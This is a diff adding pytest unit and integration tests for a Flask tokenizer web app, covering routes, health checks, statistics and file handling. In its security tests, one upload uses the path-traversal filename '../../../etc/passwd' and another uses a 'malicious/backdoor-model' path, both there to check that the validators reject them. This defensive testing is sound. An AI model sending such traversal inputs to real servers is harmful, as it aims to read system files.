+ # Mock tokenizer service to return error
244
+ mock_tokenizer.load_tokenizer.return_value = (None, {}, "Model not found")
245
+
246
+ with pytest.raises(Exception) as excinfo:
247
+ self.service.process_text_for_tokenization(
248
+ text="Hello world",
249
+ model_id_or_name='invalid-model'
250
+ )
251
+
252
+ assert "Model not found" in str(excinfo.value)
253
+
254
+ @patch('app.services.file_service.tokenizer_service')
255
+ @patch('app.services.file_service.stats_service')
256
+ def test_process_text_preview_mode(self, mock_stats, mock_tokenizer):
257
+ """Test text processing in preview mode."""
258
+ long_text = "A" * 10000 # Long text
259
+
260
+ # Mock tokenizer service
261
+ mock_tokenizer_obj = Mock()
262
+ mock_tokenizer_obj.tokenize.return_value = ['A'] * 5000 # Many tokens
263
+ mock_tokenizer.load_tokenizer.return_value = (mock_tokenizer_obj, {}, None)
264
+
265
+ # Mock stats service
266
+ mock_stats.get_token_stats.return_value = {
267
+ 'basic_stats': {'total_tokens': 5000},
268
+ 'length_stats': {'avg_length': '1.0'}
269
+ }
270
+ mock_stats.format_tokens_for_display.return_value = []
271
+
272
+ result = self.service.process_text_for_tokenization(
273
+ text=long_text,
274
+ model_id_or_name='gpt2',
275
+ is_preview=True,
276
+ preview_char_limit=100
277
+ )
278
+
279
+ assert result['preview_only'] is True
280
+
281
+ def test_allowed_extensions_constant(self):
282
+ """Test that ALLOWED_EXTENSIONS contains expected extensions."""
283
+ extensions = self.service.ALLOWED_EXTENSIONS
284
+
285
+ assert isinstance(extensions, set)
286
+
287
+ # Check for required extensions
288
+ required_extensions = {'.txt', '.md', '.py', '.js', '.json', '.html', '.css', '.csv', '.log'}
289
+ assert required_extensions.issubset(extensions)
290
+
291
+ # All extensions should start with dot
292
+ for ext in extensions:
293
+ assert ext.startswith('.')
294
+ assert len(ext) > 1
tests/test_routes.py ADDED
@@ -0,0 +1,427 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Integration tests for Flask routes
3
+ """
4
+ import pytest
5
+ import json
6
+ import tempfile
7
+ import os
8
+ from unittest.mock import patch, Mock
9
+ from io import BytesIO
10
+ from werkzeug.datastructures import FileStorage
11
+
12
+
13
+ class TestMainRoutes:
14
+ """Integration tests for main application routes."""
15
+
16
+ def test_index_get_basic(self, client):
17
+ """Test basic GET request to index."""
18
+ response = client.get('/')
19
+
20
+ assert response.status_code == 200
21
+ assert b'Tokenizer Pro' in response.data
22
+ assert b'Advanced tokenization analysis' in response.data
23
+ assert b'textarea' in response.data
24
+
25
+ def test_index_get_with_parameters(self, client):
26
+ """Test GET request with query parameters."""
27
+ response = client.get('/?model=gpt2&model_type=predefined')
28
+
29
+ assert response.status_code == 200
30
+ assert b'gpt2' in response.data or b'GPT-2' in response.data
31
+
32
+ @patch('app.services.tokenizer_service.tokenizer_service')
33
+ @patch('app.services.file_service.file_service')
34
+ def test_index_post_text_analysis(self, mock_file_service, mock_tokenizer_service, client):
35
+ """Test POST request with text analysis."""
36
+ # Mock services
37
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {'name': 'gpt2', 'alias': 'GPT-2'}}
38
+
39
+ mock_file_service.process_text_for_tokenization.return_value = {
40
+ 'tokens': [
41
+ {
42
+ 'display': 'Hello',
43
+ 'original': 'Hello',
44
+ 'token_id': 15496,
45
+ 'colors': {'background': '#FF5733', 'text': '#FFFFFF'},
46
+ 'newline': False
47
+ }
48
+ ],
49
+ 'stats': {
50
+ 'basic_stats': {
51
+ 'total_tokens': 1,
52
+ 'unique_tokens': 1,
53
+ 'unique_percentage': '100.0',
54
+ 'special_tokens': 0,
55
+ 'space_tokens': 0,
56
+ 'newline_tokens': 0,
57
+ 'compression_ratio': '5.0'
58
+ },
59
+ 'length_stats': {
60
+ 'avg_length': '5.0',
61
+ 'median_length': '5.0',
62
+ 'std_dev': '0.0'
63
+ }
64
+ },
65
+ 'display_limit_reached': False,
66
+ 'total_tokens': 1,
67
+ 'preview_only': False,
68
+ 'tokenizer_info': {
69
+ 'vocab_size': 50257,
70
+ 'tokenizer_type': 'GPT2TokenizerFast'
71
+ }
72
+ }
73
+
74
+ response = client.post('/', data={
75
+ 'text': 'Hello',
76
+ 'model': 'gpt2',
77
+ 'model_type': 'predefined'
78
+ })
79
+
80
+ assert response.status_code == 200
81
+ mock_file_service.process_text_for_tokenization.assert_called_once()
82
+
83
+ @patch('app.services.tokenizer_service.tokenizer_service')
84
+ @patch('app.services.file_service.file_service')
85
+ def test_index_post_ajax_request(self, mock_file_service, mock_tokenizer_service, client):
86
+ """Test AJAX POST request for text analysis."""
87
+ # Mock services
88
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {'name': 'gpt2', 'alias': 'GPT-2'}}
89
+
90
+ expected_response = {
91
+ 'tokens': [],
92
+ 'stats': {'basic_stats': {}, 'length_stats': {}},
93
+ 'display_limit_reached': False,
94
+ 'total_tokens': 0
95
+ }
96
+ mock_file_service.process_text_for_tokenization.return_value = expected_response
97
+
98
+ response = client.post('/',
99
+ data={'text': 'Test', 'model': 'gpt2', 'model_type': 'predefined'},
100
+ headers={'X-Requested-With': 'XMLHttpRequest'}
101
+ )
102
+
103
+ assert response.status_code == 200
104
+ assert response.content_type == 'application/json'
105
+
106
+ data = json.loads(response.data)
107
+ assert 'tokens' in data
108
+ assert 'stats' in data
109
+
110
+ @patch('app.services.file_service.file_service')
111
+ @patch('app.services.tokenizer_service.tokenizer_service')
112
+ def test_index_post_file_upload(self, mock_tokenizer_service, mock_file_service, client, app):
113
+ """Test POST request with file upload."""
114
+ with app.app_context():
115
+ # Mock services
116
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {'name': 'gpt2', 'alias': 'GPT-2'}}
117
+
118
+ # Mock file processing
119
+ mock_file_service.save_uploaded_file.return_value = '/tmp/test_file.txt'
120
+ mock_file_service.process_file_for_tokenization.return_value = {
121
+ 'tokens': [],
122
+ 'stats': {'basic_stats': {}, 'length_stats': {}},
123
+ 'display_limit_reached': False,
124
+ 'total_tokens': 0,
125
+ 'preview_only': True
126
+ }
127
+ mock_file_service.cleanup_file.return_value = None
128
+
129
+ # Create test file data
130
+ file_data = BytesIO(b"Hello world! This is a test file.")
131
+
132
+ response = client.post('/',
133
+ data={
134
+ 'file': (file_data, 'test.txt'),
135
+ 'model': 'gpt2',
136
+ 'model_type': 'predefined'
137
+ },
138
+ content_type='multipart/form-data'
139
+ )
140
+
141
+ assert response.status_code == 200
142
+ mock_file_service.save_uploaded_file.assert_called_once()
143
+ mock_file_service.process_file_for_tokenization.assert_called_once()
144
+ mock_file_service.cleanup_file.assert_called_once()
145
+
146
+ @patch('app.utils.validators.validators')
147
+ def test_index_post_validation_error(self, mock_validators, client):
148
+ """Test POST request with validation error."""
149
+ from app.utils.validators import ValidationError
150
+
151
+ # Mock validation to raise error
152
+ mock_validators.validate_text_input.side_effect = ValidationError("Invalid input")
153
+
154
+ response = client.post('/',
155
+ data={'text': 'Invalid text', 'model': 'gpt2'},
156
+ headers={'X-Requested-With': 'XMLHttpRequest'}
157
+ )
158
+
159
+ assert response.status_code == 400
160
+ data = json.loads(response.data)
161
+ assert 'error' in data
162
+ assert 'Invalid input' in data['error']
163
+
164
+ def test_index_post_empty_data(self, client):
165
+ """Test POST request with empty data."""
166
+ response = client.post('/', data={})
167
+
168
+ assert response.status_code == 200
169
+ # Should return the form again without processing
170
+
171
+
172
+ class TestTokenizerInfoRoute:
173
+ """Integration tests for tokenizer info route."""
174
+
175
+ @patch('app.services.tokenizer_service.tokenizer_service')
176
+ def test_tokenizer_info_predefined_model(self, mock_tokenizer_service, client):
177
+ """Test tokenizer info for predefined model."""
178
+ # Mock service
179
+ mock_tokenizer_service.is_predefined_model.return_value = True
180
+ mock_tokenizer_service.load_tokenizer.return_value = (
181
+ Mock(),
182
+ {
183
+ 'vocab_size': 50257,
184
+ 'tokenizer_type': 'GPT2TokenizerFast',
185
+ 'model_max_length': 1024,
186
+ 'special_tokens': {'eos_token': '</s>'}
187
+ },
188
+ None
189
+ )
190
+
191
+ response = client.get('/tokenizer-info?model_id=gpt2&is_custom=false')
192
+
193
+ assert response.status_code == 200
194
+ assert response.content_type == 'application/json'
195
+
196
+ data = json.loads(response.data)
197
+ assert 'vocab_size' in data
198
+ assert 'tokenizer_type' in data
199
+ assert data['vocab_size'] == 50257
200
+
201
+ @patch('app.services.tokenizer_service.tokenizer_service')
202
+ @patch('app.utils.validators.validators')
203
+ def test_tokenizer_info_custom_model(self, mock_validators, mock_tokenizer_service, client):
204
+ """Test tokenizer info for custom model."""
205
+ # Mock validation
206
+ mock_validators.validate_model_path.return_value = None
207
+
208
+ # Mock service
209
+ mock_tokenizer_service.is_predefined_model.return_value = False
210
+ mock_tokenizer_service.load_tokenizer.return_value = (
211
+ Mock(),
212
+ {
213
+ 'vocab_size': 32000,
214
+ 'tokenizer_type': 'LlamaTokenizerFast',
215
+ 'special_tokens': {}
216
+ },
217
+ None
218
+ )
219
+
220
+ response = client.get('/tokenizer-info?model_id=meta-llama/Llama-2-7b-hf&is_custom=true')
221
+
222
+ assert response.status_code == 200
223
+ data = json.loads(response.data)
224
+ assert data['vocab_size'] == 32000
225
+
226
+ def test_tokenizer_info_missing_model_id(self, client):
227
+ """Test tokenizer info without model_id."""
228
+ response = client.get('/tokenizer-info')
229
+
230
+ assert response.status_code == 400
231
+ data = json.loads(response.data)
232
+ assert 'error' in data
233
+ assert 'No model ID provided' in data['error']
234
+
235
+ @patch('app.utils.validators.validators')
236
+ def test_tokenizer_info_validation_error(self, mock_validators, client):
237
+ """Test tokenizer info with validation error."""
238
+ from app.utils.validators import ValidationError
239
+
240
+ # Mock validation to raise error
241
+ mock_validators.validate_model_path.side_effect = ValidationError("Invalid model path")
242
+
243
+ response = client.get('/tokenizer-info?model_id=invalid/path&is_custom=true')
244
+
245
+ assert response.status_code == 400
246
+ data = json.loads(response.data)
247
+ assert 'error' in data
248
+ assert 'Invalid model path' in data['error']
249
+
250
+ @patch('app.services.tokenizer_service.tokenizer_service')
251
+ def test_tokenizer_info_service_error(self, mock_tokenizer_service, client):
252
+ """Test tokenizer info with service error."""
253
+ # Mock service to return error
254
+ mock_tokenizer_service.is_predefined_model.return_value = True
255
+ mock_tokenizer_service.load_tokenizer.return_value = (None, {}, "Failed to load tokenizer")
256
+
257
+ response = client.get('/tokenizer-info?model_id=gpt2&is_custom=false')
258
+
259
+ assert response.status_code == 400
260
+ data = json.loads(response.data)
261
+ assert 'error' in data
262
+ assert 'Failed to load tokenizer' in data['error']
263
+
264
+
265
+ class TestHealthCheckRoutes:
266
+ """Integration tests for health check routes."""
267
+
268
+ def test_basic_health_check(self, client):
269
+ """Test basic health check endpoint."""
270
+ response = client.get('/health')
271
+
272
+ assert response.status_code == 200
273
+ assert response.content_type == 'application/json'
274
+
275
+ data = json.loads(response.data)
276
+ assert 'status' in data
277
+ assert 'timestamp' in data
278
+ assert 'version' in data
279
+ assert data['status'] == 'healthy'
280
+
281
+ @patch('app.services.tokenizer_service.tokenizer_service')
282
+ @patch('psutil.cpu_percent')
283
+ @patch('psutil.virtual_memory')
284
+ @patch('psutil.disk_usage')
285
+ def test_detailed_health_check(self, mock_disk, mock_memory, mock_cpu, mock_tokenizer_service, client):
286
+ """Test detailed health check endpoint."""
287
+ # Mock system info
288
+ mock_cpu.return_value = 25.5
289
+ mock_memory.return_value = Mock(total=8000000000, available=4000000000, percent=50.0, used=4000000000)
290
+ mock_disk.return_value = Mock(total=100000000000, used=50000000000, free=50000000000)
291
+
292
+ # Mock tokenizer service
293
+ mock_tokenizer_service.tokenizers = {}
294
+ mock_tokenizer_service.custom_tokenizers = {}
295
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {}}
296
+ mock_tokenizer_service.load_tokenizer.return_value = (Mock(), {}, None)
297
+
298
+ response = client.get('/health/detailed')
299
+
300
+ assert response.status_code == 200
301
+ data = json.loads(response.data)
302
+
303
+ assert 'status' in data
304
+ assert 'system' in data
305
+ assert 'services' in data
306
+ assert 'configuration' in data
307
+
308
+ # Check system info
309
+ assert 'cpu_percent' in data['system']
310
+ assert 'memory' in data['system']
311
+ assert 'disk' in data['system']
312
+
313
+ # Check services info
314
+ assert 'tokenizer_service' in data['services']
315
+ assert 'file_service' in data['services']
316
+
317
+ @patch('app.services.tokenizer_service.tokenizer_service')
318
+ def test_readiness_check_ready(self, mock_tokenizer_service, client, app):
319
+ """Test readiness check when application is ready."""
320
+ with app.app_context():
321
+ # Mock successful tokenizer loading
322
+ mock_tokenizer_service.load_tokenizer.return_value = (Mock(), {}, None)
323
+
324
+ response = client.get('/health/ready')
325
+
326
+ assert response.status_code == 200
327
+ data = json.loads(response.data)
328
+
329
+ assert 'ready' in data
330
+ assert 'checks' in data
331
+ assert isinstance(data['checks'], dict)
332
+
333
+ @patch('app.services.tokenizer_service.tokenizer_service')
334
+ def test_readiness_check_not_ready(self, mock_tokenizer_service, client):
335
+ """Test readiness check when application is not ready."""
336
+ # Mock failed tokenizer loading
337
+ mock_tokenizer_service.load_tokenizer.return_value = (None, {}, "Failed to load")
338
+
339
+ response = client.get('/health/ready')
340
+
341
+ assert response.status_code == 503
342
+ data = json.loads(response.data)
343
+
344
+ assert data['ready'] is False
345
+ assert 'checks' in data
346
+
347
+
348
+ class TestErrorHandling:
349
+ """Test error handling across routes."""
350
+
351
+ def test_404_handling(self, client):
352
+ """Test 404 error handling."""
353
+ response = client.get('/nonexistent-route')
354
+ assert response.status_code == 404
355
+
356
+ def test_405_method_not_allowed(self, client):
357
+ """Test 405 error for wrong HTTP method."""
358
+ response = client.put('/') # PUT not allowed
359
+ assert response.status_code == 405
360
+
361
+ @patch('app.services.tokenizer_service.tokenizer_service')
362
+ def test_500_internal_error(self, mock_tokenizer_service, client):
363
+ """Test 500 error handling."""
364
+ # Mock service to raise unexpected exception
365
+ mock_tokenizer_service.TOKENIZER_MODELS = {'gpt2': {'name': 'gpt2', 'alias': 'GPT-2'}}
366
+
367
+ with patch('app.services.file_service.file_service') as mock_file_service:
368
+ mock_file_service.process_text_for_tokenization.side_effect = Exception("Unexpected error")
369
+
370
+ response = client.post('/',
371
+ data={'text': 'Test', 'model': 'gpt2', 'model_type': 'predefined'},
372
+ headers={'X-Requested-With': 'XMLHttpRequest'}
373
+ )
374
+
375
+ assert response.status_code == 400 # Our app returns 400 for processing errors
376
+ data = json.loads(response.data)
377
+ assert 'error' in data
378
+
379
+
380
+ class TestSecurityFeatures:
381
+ """Test security features in routes."""
382
+
383
+ @patch('app.utils.validators.validators')
384
+ def test_malicious_filename_blocked(self, mock_validators, client):
385
+ """Test that malicious filenames are blocked."""
386
+ from app.utils.validators import ValidationError
387
+
388
+ # Mock validation to detect malicious filename
389
+ mock_validators.validate_filename.side_effect = ValidationError("Malicious filename detected")
390
+
391
+ file_data = BytesIO(b"test content")
392
+
393
+ response = client.post('/',
394
+ data={
395
+ 'file': (file_data, '../../../etc/passwd'),
396
+ 'model': 'gpt2',
397
+ 'model_type': 'predefined'
398
+ },
399
+ content_type='multipart/form-data',
400
+ headers={'X-Requested-With': 'XMLHttpRequest'}
401
+ )
402
+
403
+ assert response.status_code == 400
404
+ data = json.loads(response.data)
405
+ assert 'error' in data
406
+
407
+ @patch('app.utils.validators.validators')
408
+ def test_malicious_model_path_blocked(self, mock_validators, client):
409
+ """Test that malicious model paths are blocked."""
410
+ from app.utils.validators import ValidationError
411
+
412
+ # Mock validation to detect malicious model path
413
+ mock_validators.validate_model_path.side_effect = ValidationError("Untrusted model path")
414
+
415
+ response = client.post('/',
416
+ data={
417
+ 'text': 'Test',
418
+ 'custom_model': 'malicious/backdoor-model',
419
+ 'model_type': 'custom'
420
+ },
421
+ headers={'X-Requested-With': 'XMLHttpRequest'}
422
+ )
423
+
424
+ assert response.status_code == 400
425
+ data = json.loads(response.data)
426
+ assert 'error' in data
427
+ assert 'Untrusted model path' in data['error']
tests/test_stats_service.py ADDED
@@ -0,0 +1,250 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Unit tests for StatsService
3
+ """
4
+ import pytest
5
+ from unittest.mock import Mock
6
+ from app.services.stats_service import StatsService
7
+
8
+
9
+ class TestStatsService:
10
+ """Test cases for StatsService."""
11
+
12
+ def setup_method(self):
13
+ """Set up test fixtures."""
14
+ self.service = StatsService()
15
+
16
+ def test_get_varied_color_basic(self):
17
+ """Test basic color generation."""
18
+ color = self.service.get_varied_color(0, 10)
19
+
20
+ assert isinstance(color, dict)
21
+ assert 'background' in color
22
+ assert 'text' in color
23
+ assert color['background'].startswith('#')
24
+ assert color['text'].startswith('#')
25
+ assert len(color['background']) == 7 # #RRGGBB format
26
+ assert len(color['text']) == 7
27
+
28
+ def test_get_varied_color_different_indices(self):
29
+ """Test that different indices produce different colors."""
30
+ color1 = self.service.get_varied_color(0, 10)
31
+ color2 = self.service.get_varied_color(1, 10)
32
+ color3 = self.service.get_varied_color(5, 10)
33
+
34
+ # Colors should be different
35
+ assert color1['background'] != color2['background']
36
+ assert color2['background'] != color3['background']
37
+ assert color1['background'] != color3['background']
38
+
39
+ def test_get_varied_color_edge_cases(self):
40
+ """Test color generation with edge cases."""
41
+ # Single token
42
+ color = self.service.get_varied_color(0, 1)
43
+ assert isinstance(color, dict)
44
+
45
+ # Large number of tokens
46
+ color = self.service.get_varied_color(999, 1000)
47
+ assert isinstance(color, dict)
48
+
49
+ # Zero index
50
+ color = self.service.get_varied_color(0, 5)
51
+ assert isinstance(color, dict)
52
+
53
+ def test_fix_token_basic(self):
54
+ """Test basic token fixing."""
55
+ assert self.service.fix_token("hello") == "hello"
56
+ assert self.service.fix_token("world") == "world"
57
+
58
+ def test_fix_token_special_characters(self):
59
+ """Test token fixing with special characters."""
60
+ # Test space replacement
61
+ assert self.service.fix_token(" ") == "␣"
62
+ assert self.service.fix_token("\t") == "→"
63
+ assert self.service.fix_token("\n") == "↵"
64
+
65
+ # Test Ġ prefix (common in tokenizers)
66
+ assert self.service.fix_token("Ġhello") == " hello"
67
+ assert self.service.fix_token("Ġworld") == " world"
68
+
69
+ # Test combination
70
+ assert self.service.fix_token("Ġ") == " "
71
+
72
+ def test_fix_token_edge_cases(self):
73
+ """Test token fixing edge cases."""
74
+ # Empty string
75
+ assert self.service.fix_token("") == ""
76
+
77
+ # None (shouldn't happen but test defensive programming)
78
+ result = self.service.fix_token(None)
79
+ assert result is None or result == ""
80
+
81
+ # Multiple special characters
82
+ assert self.service.fix_token("\n\t ") == "↵→␣"
83
+
84
+ # Multiple Ġ prefixes (edge case)
85
+ assert self.service.fix_token("ĠĠhello") == " hello"
86
+
87
+ def test_get_token_stats_basic(self, sample_tokens, sample_text):
88
+ """Test basic token statistics calculation."""
89
+ stats = self.service.get_token_stats(sample_tokens, sample_text)
90
+
91
+ assert isinstance(stats, dict)
92
+ assert 'basic_stats' in stats
93
+ assert 'length_stats' in stats
94
+
95
+ basic = stats['basic_stats']
96
+ length = stats['length_stats']
97
+
98
+ # Check basic stats structure
99
+ assert 'total_tokens' in basic
100
+ assert 'unique_tokens' in basic
101
+ assert 'unique_percentage' in basic
102
+ assert 'special_tokens' in basic
103
+ assert 'space_tokens' in basic
104
+ assert 'newline_tokens' in basic
105
+ assert 'compression_ratio' in basic
106
+
107
+ # Check length stats structure
108
+ assert 'avg_length' in length
109
+ assert 'median_length' in length
110
+ assert 'std_dev' in length
111
+
112
+ def test_get_token_stats_calculations(self):
113
+ """Test specific statistics calculations."""
114
+ tokens = ['Hello', ' world', '!', ' test']
115
+ text = "Hello world! test"
116
+
117
+ stats = self.service.get_token_stats(tokens, text)
118
+ basic = stats['basic_stats']
119
+
120
+ # Test total tokens
121
+ assert basic['total_tokens'] == 4
122
+
123
+ # Test unique tokens (all are unique in this case)
124
+ assert basic['unique_tokens'] == 4
125
+ assert basic['unique_percentage'] == "100.0"
126
+
127
+ # Test compression ratio
128
+ expected_ratio = len(text) / len(tokens)
129
+ assert float(basic['compression_ratio']) == pytest.approx(expected_ratio, rel=1e-2)
130
+
131
+ def test_get_token_stats_special_tokens(self):
132
+ """Test special token counting."""
133
+ tokens = ['<s>', 'Hello', ' world', '</s>', '<pad>']
134
+ text = "Hello world"
135
+
136
+ stats = self.service.get_token_stats(tokens, text)
137
+ basic = stats['basic_stats']
138
+
139
+ # Should detect special tokens (those with < >)
140
+ assert basic['special_tokens'] >= 2 # <s>, </s>, <pad>
141
+
142
+ def test_get_token_stats_whitespace_tokens(self):
143
+ """Test whitespace token counting."""
144
+ tokens = ['Hello', ' ', 'world', '\n', 'test', '\t']
145
+ text = "Hello world\ntest\t"
146
+
147
+ stats = self.service.get_token_stats(tokens, text)
148
+ basic = stats['basic_stats']
149
+
150
+ # Should count space and tab tokens
151
+ assert basic['space_tokens'] >= 1
152
+ assert basic['newline_tokens'] >= 1
153
+
154
+ def test_get_token_stats_length_calculations(self):
155
+ """Test token length statistics."""
156
+ tokens = ['a', 'bb', 'ccc', 'dddd'] # Lengths: 1, 2, 3, 4
157
+ text = "a bb ccc dddd"
158
+
159
+ stats = self.service.get_token_stats(tokens, text)
160
+ length = stats['length_stats']
161
+
162
+ # Average length should be 2.5
163
+ assert float(length['avg_length']) == pytest.approx(2.5, rel=1e-2)
164
+
165
+ # Median should be 2.5 (between 2 and 3)
166
+ assert float(length['median_length']) == pytest.approx(2.5, rel=1e-2)
167
+
168
+ def test_get_token_stats_empty_input(self):
169
+ """Test statistics with empty input."""
170
+ stats = self.service.get_token_stats([], "")
171
+
172
+ basic = stats['basic_stats']
173
+ length = stats['length_stats']
174
+
175
+ assert basic['total_tokens'] == 0
176
+ assert basic['unique_tokens'] == 0
177
+ assert basic['unique_percentage'] == "0.0"
178
+ assert basic['compression_ratio'] == "0.0"
179
+
180
+ # Length stats should handle empty case gracefully
181
+ assert length['avg_length'] == "0.0"
182
+ assert length['median_length'] == "0.0"
183
+ assert length['std_dev'] == "0.0"
184
+
185
+ def test_format_tokens_for_display_basic(self, mock_tokenizer):
186
+ """Test basic token formatting for display."""
187
+ tokens = ['Hello', ' world', '!']
188
+
189
+ # Mock the tokenizer.convert_ids_to_tokens method
190
+ mock_tokenizer.convert_ids_to_tokens.return_value = tokens
191
+
192
+ formatted = self.service.format_tokens_for_display(tokens, mock_tokenizer)
193
+
194
+ assert isinstance(formatted, list)
195
+ assert len(formatted) == len(tokens)
196
+
197
+ for i, token_data in enumerate(formatted):
198
+ assert isinstance(token_data, dict)
199
+ assert 'display' in token_data
200
+ assert 'original' in token_data
201
+ assert 'token_id' in token_data
202
+ assert 'colors' in token_data
203
+ assert 'newline' in token_data
204
+
205
+ assert token_data['original'] == tokens[i]
206
+ assert isinstance(token_data['colors'], dict)
207
+ assert 'background' in token_data['colors']
208
+ assert 'text' in token_data['colors']
209
+
210
+ def test_format_tokens_newline_detection(self, mock_tokenizer):
211
+ """Test newline detection in token formatting."""
212
+ tokens = ['Hello', '\n', 'world']
213
+
214
+ mock_tokenizer.convert_ids_to_tokens.return_value = tokens
215
+
216
+ formatted = self.service.format_tokens_for_display(tokens, mock_tokenizer)
217
+
218
+ # Second token should be marked as newline
219
+ assert formatted[1]['newline'] is True
220
+ assert formatted[0]['newline'] is False
221
+ assert formatted[2]['newline'] is False
222
+
223
+ def test_format_tokens_color_consistency(self, mock_tokenizer):
224
+ """Test that same tokens get same colors."""
225
+ tokens = ['hello', 'world', 'hello'] # 'hello' appears twice
226
+
227
+ mock_tokenizer.convert_ids_to_tokens.return_value = tokens
228
+
229
+ formatted = self.service.format_tokens_for_display(tokens, mock_tokenizer)
230
+
231
+ # Same tokens should have same colors
232
+ assert formatted[0]['colors']['background'] == formatted[2]['colors']['background']
233
+ assert formatted[0]['colors']['text'] == formatted[2]['colors']['text']
234
+
235
+ # Different tokens should have different colors
236
+ assert formatted[0]['colors']['background'] != formatted[1]['colors']['background']
237
+
238
+ def test_format_tokens_special_character_handling(self, mock_tokenizer):
239
+ """Test special character handling in token formatting."""
240
+ tokens = [' ', '\t', '\n', 'Ġhello']
241
+
242
+ mock_tokenizer.convert_ids_to_tokens.return_value = tokens
243
+
244
+ formatted = self.service.format_tokens_for_display(tokens, mock_tokenizer)
245
+
246
+ # Check that special characters are properly converted
247
+ assert formatted[0]['display'] == '␣' # Space
248
+ assert formatted[1]['display'] == '→' # Tab
249
+ assert formatted[2]['display'] == '↵' # Newline
250
+ assert formatted[3]['display'] == ' hello' # Ġ prefix
tests/test_tokenizer_service.py ADDED
@@ -0,0 +1,185 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Unit tests for TokenizerService
3
+ """
4
+ import pytest
5
+ from unittest.mock import Mock, patch, MagicMock
6
+ from app.services.tokenizer_service import TokenizerService
7
+ import time
8
+
9
+
10
+ class TestTokenizerService:
11
+ """Test cases for TokenizerService."""
12
+
13
+ def setup_method(self):
14
+ """Set up test fixtures."""
15
+ self.service = TokenizerService()
16
+
17
+ def test_is_predefined_model(self):
18
+ """Test predefined model checking."""
19
+ # Test with existing model
20
+ assert self.service.is_predefined_model('gpt2') is True
21
+
22
+ # Test with non-existing model
23
+ assert self.service.is_predefined_model('nonexistent-model') is False
24
+
25
+ # Test with empty string
26
+ assert self.service.is_predefined_model('') is False
27
+
28
+ def test_get_tokenizer_info_basic(self, mock_tokenizer):
29
+ """Test basic tokenizer info extraction."""
30
+ info = self.service.get_tokenizer_info(mock_tokenizer)
31
+
32
+ assert 'vocab_size' in info
33
+ assert 'tokenizer_type' in info
34
+ assert 'special_tokens' in info
35
+ assert info['vocab_size'] == 50257
36
+ assert info['tokenizer_type'] == 'MockTokenizer'
37
+
38
+ # Check special tokens
39
+ special_tokens = info['special_tokens']
40
+ assert 'pad_token' in special_tokens
41
+ assert 'eos_token' in special_tokens
42
+ assert special_tokens['pad_token'] == '<pad>'
43
+ assert special_tokens['eos_token'] == '</s>'
44
+
45
+ def test_get_tokenizer_info_with_max_length(self, mock_tokenizer):
46
+ """Test tokenizer info with model_max_length."""
47
+ mock_tokenizer.model_max_length = 2048
48
+
49
+ info = self.service.get_tokenizer_info(mock_tokenizer)
50
+
51
+ assert 'model_max_length' in info
52
+ assert info['model_max_length'] == 2048
53
+
54
+ def test_get_tokenizer_info_error_handling(self):
55
+ """Test error handling in tokenizer info extraction."""
56
+ # Create a mock that raises an exception
57
+ broken_tokenizer = Mock()
58
+ broken_tokenizer.__class__.__name__ = 'BrokenTokenizer'
59
